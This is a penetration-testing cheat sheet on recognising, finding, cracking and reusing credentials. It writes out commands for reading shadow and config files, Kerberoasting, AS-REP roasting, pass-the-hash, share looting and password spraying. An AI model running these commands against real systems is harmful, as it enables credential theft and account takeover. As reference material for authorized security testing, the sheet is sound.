Credential Tracking
Where to find credentials, what they look like, and how to track them across an engagement.
WHAT CREDENTIALS LOOK LIKE
Plaintext passwords
Found in config files, databases, shares, history files — Use everywhere
admin123
P@ssw0rd!
Summer2025!
CompanyName2024
NTLM hash
32 hex characters, no salt — Dumped from SAM, secretsdump, mimikatz. Can be cracked (hashcat -m 1000) or used directly with Pass the Hash.
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
│ LM hash │ NT hash │
Example — Full SAM dump format
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:68510b169745bd23fae40e4a24cb080c:::
Format: username:RID:LM_hash:NT_hash:::
Crack NT hash: hashcat -m 1000 hash.txt rockyou.txt
Pass the Hash: crackmapexec smb $IP -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
NTLMv2 hash
Captured from Responder or network sniffing — Must be cracked, cannot Pass the Hash with this
john::CORP:1122334455667788:ABC123DEF456789012345678901234567890:0101000000000000...
│user│ │dom│ │challenge │ │NTLMv2 response│
Example — Responder capture
[SMB] NTLMv2-SSP Client : 10.10.10.50
[SMB] NTLMv2-SSP Username : CORP\john
[SMB] NTLMv2-SSP Hash : john::CORP:1122334455667788:a]bc123def456:0101000000000000...
Crack: hashcat -m 5600 hash.txt rockyou.txt
Cannot PtH — must crack to plaintext first
Kerberoast TGS hash
Extracted via GetUserSPNs — Service account hash, often has a weak password
$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQL/db01.corp.local*$abc123...
│ prefix │ │ user │ │ domain │ │ SPN │ │hash│
Example — Impacket output
impacket-GetUserSPNs corp.local/john:'Password1' -dc-ip 10.10.10.1 -request
ServicePrincipalName Name MemberOf
MSSQL/db01.corp.local svc_sql CN=Domain Admins
$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQL/db01.corp.local*$f3a5b8c2d1e...
Crack: hashcat -m 13100 hash.txt rockyou.txt
AS-REP hash
From accounts without Kerberos pre-authentication — No creds needed to obtain
$krb5asrep$23$svc_backup@CORP.LOCAL:abc123def456...
│ prefix │ │ user@domain │ │ hash │
Example — Impacket output
impacket-GetNPUsers corp.local/ -dc-ip 10.10.10.1 -usersfile users.txt -no-pass
[*] Getting TGT for svc_backup
$krb5asrep$23$svc_backup@CORP.LOCAL:a1b2c3d4e5f6...
Crack: hashcat -m 18200 hash.txt rockyou.txt
Linux password hash (/etc/shadow)
Format depends on algorithm — $1$ (MD5), $5$ (SHA256), $6$ (SHA512)
root:$6$randomsalt$longhashstring...:19000:0:99999:7:::
│user│$6│ salt │ SHA512 hash │ │password age fields│
Example — /etc/shadow entries
root:$6$xyz123$A1B2C3D4E5F6G7H8I9J0...:19443:0:99999:7:::
admin:$1$abc$ShortMD5Hash...:19443:0:99999:7:::
www-data:*:19000:0:99999:7::: ← * means no login
$1$ = MD5 → hashcat -m 500
$5$ = SHA256 → hashcat -m 7400
$6$ = SHA512 → hashcat -m 1800
Crack: unshadow /etc/passwd /etc/shadow > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt
SSH private key
Found in .ssh directories, backups, shares — May be passphrase protected
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIA...
-----END OPENSSH PRIVATE KEY-----
Usage
chmod 600 id_rsa
ssh -i id_rsa user@$IP
If passphrase protected:
ssh2john id_rsa > ssh.hash
john ssh.hash --wordlist=rockyou.txt
bcrypt hash
From web application databases — Slow to crack, use rules
$2y$10$ABC123def456GHI789jkl.MNOPQR012stuvwxYZ345678abcdefgh
│$2y│cost│ 22-char salt + 31-char hash │
Example
Found in: WordPress wp_users table, web app databases
$2y$10$ or $2a$10$ prefix
Crack: hashcat -m 3200 hash.txt rockyou.txt -r best64.rule
Very slow — use small targeted wordlists with rules
WHERE TO FIND CREDENTIALS
Configuration files
Always check these paths — Plaintext DB creds, API keys, secret keys
# Web configs:
cat /var/www/html/wp-config.php
cat /var/www/html/configuration.php
cat /var/www/html/config.php
cat /var/www/html/.env
cat /var/www/html/app/etc/local.xml
# System configs:
cat /etc/shadow
cat /etc/tomcat*/tomcat-users.xml
cat /opt/*/config.yml
History files
Check for ALL users — Commands with passwords typed inline
cat /home/*/.bash_history
cat /root/.bash_history
cat /home/*/.mysql_history
# Windows:
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
HTML source and JavaScript
View source on EVERY page — Hardcoded creds, API tokens, debug info
curl -s http://$IP/ | grep -iE "password|passwd|secret|token|api.key"
# Check JavaScript files for API keys and endpoints
Network shares and file servers
Download and search EVERYTHING — Config backups, credential files, SSH keys
smbclient //$IP/share -N -c "recurse;prompt;mget *"
grep -r "password" ./loot/ --include="*.txt" --include="*.xml" --include="*.conf"
Database tables
SELECT * FROM users — Always check for creds
# MySQL:
SELECT user,password FROM mysql.user;
SELECT * FROM users;
# MSSQL:
SELECT name, password_hash FROM sys.sql_logins;
# PostgreSQL:
SELECT usename, passwd FROM pg_shadow;
Windows registry and saved creds
Autologon, VNC, PuTTY, WiFi passwords
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query HKLM /f password /t REG_SZ /s
cmdkey /list
LDAP user descriptions
Admins put temp passwords in AD description fields
ldapsearch -x -H ldap://$DC_IP -D "user@domain.local" -w 'password' -b "DC=domain,DC=local" "(description=*pass*)" description sAMAccountName
Email / mailboxes
Login with found creds — Password resets, shared credentials
curl -k "imaps://$IP/INBOX" -u user:password -X "FETCH 1:* BODY[TEXT]" | grep -i password
Process command lines
Passwords passed as arguments — Visible via SNMP or ps
# Linux:
ps aux | grep -i pass
# SNMP:
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.4.2.1.5
CREDENTIAL TRACKING MATRIX
Use this template during engagements — Log every credential and where you tried it.
┌──────────┬──────────┬──────────┬─────┬─────┬───────┬─────┬─────┬───────┐
│ Username │ Password │ Source │ SSH │ SMB │ WinRM │ RDP │ Web │ DB │
├──────────┼──────────┼──────────┼─────┼─────┼───────┼─────┼─────┼───────┤
│ admin │ admin123 │ FTP conf │ ✓ │ ✓ │ ✗ │ ✗ │ ✓ │ │
│ john │ NTLMhash │ SAM dump │ n/a │ PtH │ PtH │ │ │ │
│ svc_sql │ Summer25 │ Kerbrst │ │ ✓ │ ✓ │ │ │ ✓ │
│ root │ $6$hash │ /shadow │crack│ │ │ │ │ │
└──────────┴──────────┴──────────┴─────┴─────┴───────┴─────┴─────┴───────┘
Rules:
1. Try EVERY credential on EVERY service
2. Try password reuse across all users
3. Try common mutations: Password1 → Password2, password1!, Password2025
4. Spray Season+Year: Summer2025!, Winter2024!, Spring2025
5. Document what worked and what didn't